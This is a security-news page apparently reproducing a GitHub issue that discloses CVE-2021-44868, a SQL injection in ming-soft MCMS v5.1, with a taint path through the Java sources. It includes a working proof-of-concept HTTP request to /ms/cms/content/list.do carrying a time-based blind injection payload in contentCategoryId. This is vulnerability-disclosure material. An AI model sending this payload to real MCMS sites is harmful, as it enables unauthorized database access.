Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-44868: MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability · Issue #58 · ming-soft/MCMS

A problem was found in ming-soft MCMS v5.1. There is a sql injection vulnerability in /ms/cms/content/list.do

CVE
#sql#vulnerability#web#windows#apple#git#java

Vulnerability file:

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

#Vulnerability tracking path:

1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --The return value of call queryChildren() is tained
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --The return value of call
queryChildren() is tained
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column~iterator
7.  MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:52行  --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:148行  --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:183行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:77行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:253行  --categoryId

The risk of SQLI type is triggered, caused by the input parameter categoryId, value:
image

poc

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'

image

image
image

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907